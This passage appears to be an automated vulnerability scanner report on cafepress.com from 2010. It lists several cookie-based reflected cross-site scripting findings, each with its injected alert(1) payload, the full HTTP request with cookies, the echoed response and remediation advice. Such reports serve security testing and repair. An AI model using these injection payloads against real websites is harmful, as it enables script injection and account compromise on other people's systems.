__utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59334
Date: Sun, 26 Dec 2010 13:47:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:23 GMT; path=/
Set-Cookie: cp_sc=100115; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:23 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
= 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '5b983</script><script>alert(1)</script>ebe8ab7f2c6 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.76. http://www.cafepress.com/+yoga-mats [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+yoga-mats
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa7a8"-alert(1)-"e7fc2e4ad80 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+yoga-mats HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAfa7a8"-alert(1)-"e7fc2e4ad80 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 59513
Date: Sun, 26 Dec 2010 13:49:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:05 GMT; path=/
Set-Cookie: cp_sc=201675; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:05 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAfa7a8"-alert(1)-"e7fc2e4ad80 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.77. http://www.cafepress.com/+yoga-mats [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+yoga-mats
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f3e8</script><script>alert(1)</script>edf8d16990b was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+yoga-mats HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=4f3e8</script><script>alert(1)</script>edf8d16990b ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 59529
Date: Sun, 26 Dec 2010 13:49:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:03 GMT; path=/
Set-Cookie: cp_sc=201675; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:03 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
= 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '4f3e8</script><script>alert(1)</script>edf8d16990b ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.78. http://www.cafepress.com/TheGamingApe [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /TheGamingApe
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62888"-alert(1)-"6e0c4f15927 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /TheGamingApe HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA62888"-alert(1)-"6e0c4f15927 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 49072
Date: Sun, 26 Dec 2010 13:49:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 49072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA62888"-alert(1)-"6e0c4f15927 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.79. http://www.cafepress.com/TheGamingApe [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /TheGamingApe
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c582f</script><script>alert(1)</script>2b819df52d1 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /TheGamingApe HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=c582f</script><script>alert(1)</script>2b819df52d1 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 49112
Date: Sun, 26 Dec 2010 13:49:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 49112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook...[SNIP]...
s = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'PremiumShop' window.cafepress.tealeaf.searchTerm = 'c582f</script><script>alert(1)</script>2b819df52d1 ' window.cafepress.tealeaf.salesChannel = 'Shop' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08...[SNIP]...
1.80. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/catalogExp/RedirectWithSEOURL.aspx
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10557"-alert(1)-"7c7111c0034 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/catalogExp/RedirectWithSEOURL.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA10557"-alert(1)-"7c7111c0034 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 75201
Date: Sun, 26 Dec 2010 13:46:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 75201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]...
